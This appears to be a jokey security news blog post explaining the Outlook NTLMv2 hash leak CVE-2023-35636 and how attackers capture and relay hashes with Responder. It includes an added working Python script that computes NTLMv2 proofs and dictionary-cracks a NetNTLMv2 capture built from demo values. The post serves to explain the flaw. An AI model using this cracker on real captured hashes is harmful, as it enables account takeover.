Outlook Flaw Exposed: Hashed Passwords Up for Grabs, Patch Now to Seal the Leak!

Outlook’s got a leaky faucet, dripping passwords like a bad secret-keeper. Patch Tuesday’s plugging it up, so update before hackers tap in! #PatchTuesdayLeaks

Hot Take:

Oh, the weather outside is frightful, but hackers find vulnerabilities so delightful. And since we’ve got no place to go, patch it fast, patch it fast, patch it fast! Microsoft’s December Patch Tuesday was like an early Christmas gift for cybersecurity, wrapping up that nasty Outlook flaw with a pretty bow. But, like that one relative who always finds something to complain about, researchers say there’s more to fix. Let’s dive into the hacker’s stocking of tricks, shall we?

Key Points:

  • Microsoft’s December Patch Tuesday is like the bouncer at the club, turning away shady characters; this time it’s blocking a vulnerability in Outlook that lets attackers walk off with your NTLMv2 password hash.
  • Varonis researchers are the new neighborhood watch, spotting a bug in Outlook’s calendar-sharing feature that turns an innocent-looking invite into a hacker’s RSVP to your credentials.
  • Running a tool like Responder.py on the server the booby-trapped invite points to, crooks catch the NTLMv2 hash Outlook hands over when it connects, like catching a bridal bouquet they were never meant to have.
  • With a CVSS score of 6.5, CVE-2023-35636 is the awkward middle child: not the most dangerous, but definitely not to be ignored.
  • Microsoft patched up this way in, but the researchers still see other unpatched routes to the same NTLM leak, like the Windows Performance Analyzer, that need some deadbolts.
CVE ID: CVE-2023-35636
CVE state: PUBLISHED
CVE assigner (short name): microsoft
CVE date updated: 12/15/2023
CVE description: Microsoft Outlook Information Disclosure Vulnerability

Need to know more?

Outlook's Uninvited Plus-One

So, the cybersecurity equivalent of Sherlock and Watson at Varonis have unearthed a digital party crasher nestled in Outlook’s calendar-sharing feature. This isn’t your typical "forgot to BCC" faux pas; it’s a crafty scheme where attackers craft a calendar-sharing invite that points Outlook at a file sitting on a server they control, email it to you, and wait for you to open it. The moment you do, Outlook reaches out to that server and tries to log in, offering up your NTLMv2 hash to prove who you are. Imagine sending out party details only to have bandits show up instead of your friends, and you’ve got the picture.

Listening with Intent to Pilfer

Now, these hackers aren’t just eavesdropping; the server at the other end of that invite is theirs, running something like Responder.py, the go-to rogue SMB server for harvesting NTLM hashes. When Outlook shows up and tries to authenticate, Responder plays along just long enough to record the challenge and response, and the crooks either take that capture home to crack it or relay the live login somewhere useful, turning your hash into the passkey to your digital kingdom. It’s like having someone listen in on your phone call, but instead of gossip, they’re after your credentials.

Click Bait-and-Switch

And if you thought staying off email would keep you safe, think again. Microsoft warns that web-based attacks are also on the menu: an attacker can host a malicious website, or hijack a legitimate one, and plant a specially crafted file there that’s like a digital trojan horse, waiting to exploit the vulnerability. They can’t force you onto the site, so all it takes is a convincing email or chat message and a curious click, and you’re on the express train to Hacksville.

The Patch Is Just the Start

Microsoft might have patched the flaw, but it’s like plugging a leak with chewing gum: it holds for now, but there’s more work to be done. Outlook was only one way to make Windows cough up an NTLM hash; the researchers have their eyes on other unpatched routes to the same leak, like the Windows Performance Analyzer and File Explorer. These are the equivalent of leaving your windows open when you’ve got the front door locked, a rookie mistake in the cybersecurity neighborhood watch handbook.

Hashing It Out Over the Internet

What’s particularly intriguing, or terrifying depending on how you look at it, is that the Windows Performance Analyzer will happily authenticate with NTLMv2 to a server out on the open internet. That’s a bit like sending a secret message via a postcard: your information is out there for anyone with the right tools to see. And in the digital realm, that means the NTLMv2 challenge-response your machine hands over is ripe for the picking, either relayed to another server while the login is still in flight, or carried off and brute-forced at leisure until the password behind it falls out.
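To show what actually leaks and why "brute-force" is the right word, here is an added example, not code from the original post or from Varonis: it implements the NTLMv2 challenge-response computation (MD4 of the UTF-16LE password for the NT hash, HMAC-MD5 over the uppercased username and domain for the NTLMv2 hash, HMAC-MD5 over the server challenge and client blob for the proof) and then runs a dictionary attack over a constructed capture laid out the way Responder and hashcat mode 5600 print it. The user jdoe, domain CORP, password, challenge and blob are made-up demo values; MD4 is written out in pure Python because hashlib’s md4 is often missing under OpenSSL 3.

```python
from __future__ import annotations

import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, the hash behind the Windows NT password hash."""
    mask = 0xFFFFFFFF

    def rotl(x: int, n: int) -> int:
        x &= mask
        return ((x << n) | (x >> (32 - n))) & mask

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    # Pad to 56 mod 64, then append the bit length as a little-endian 64-bit int.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rotl(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rotl(a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rotl(a + h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE password. Never leaves the machine in this attack."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr, the 16 bytes the client sends and the attacker's SMB server records."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def make_capture(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a line in the USER::DOMAIN:challenge:proof:blob layout Responder/hashcat 5600 use."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_netntlmv2(capture: str, wordlist: list[str]) -> str | None:
    """Offline dictionary attack: one MD4 and two HMAC-MD5 per guess, no network needed."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed demo values, not a real capture: hypothetical user, an 8-byte server
# challenge and an abbreviated blob (a real one carries a timestamp and target info).
DEMO_CAPTURE = make_capture(
    "jdoe", "CORP", "Winter2023!",
    bytes.fromhex("1122334455667788"),
    bytes.fromhex("0101000000000000" + "00" * 8 + "a1b2c3d4e5f60718"),
)
DEMO_WORDLIST = ["password", "Summer2023!", "Winter2023!", "P@ssw0rd"]

if __name__ == "__main__":
    print(DEMO_CAPTURE)
    print("recovered password:", crack_netntlmv2(DEMO_CAPTURE, DEMO_WORDLIST))
```

Two things fall out of running it. First, the proof is bound to the server’s challenge, so a captured line cannot simply be replayed to the real domain controller; relay only works while the authentication is still in flight, which is why Responder-style tooling pairs the listener with a relay. Second, nothing in the computation is slow or salted with anything secret, so a weak password behind a captured NTLMv2 response is an offline-cracking problem, not a theoretical risk, and the only durable fix is to stop the authentication from leaving the network in the first place.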

Bottom line? The cyber Grinches are always looking for ways to steal your Christmas, or at least your data. So, while you're sipping that eggnog and decking the halls, make sure you've also decked your system with the latest patches. It's the cybersecurity equivalent of locking your doors and installing a high-tech alarm system—because nobody wants their digital goodies swiped by a cyber Scrooge.

Tags: CVE-2023-35636, hashed passwords, Microsoft Outlook, NTLM Hash, Patch Tuesday, phishing attacks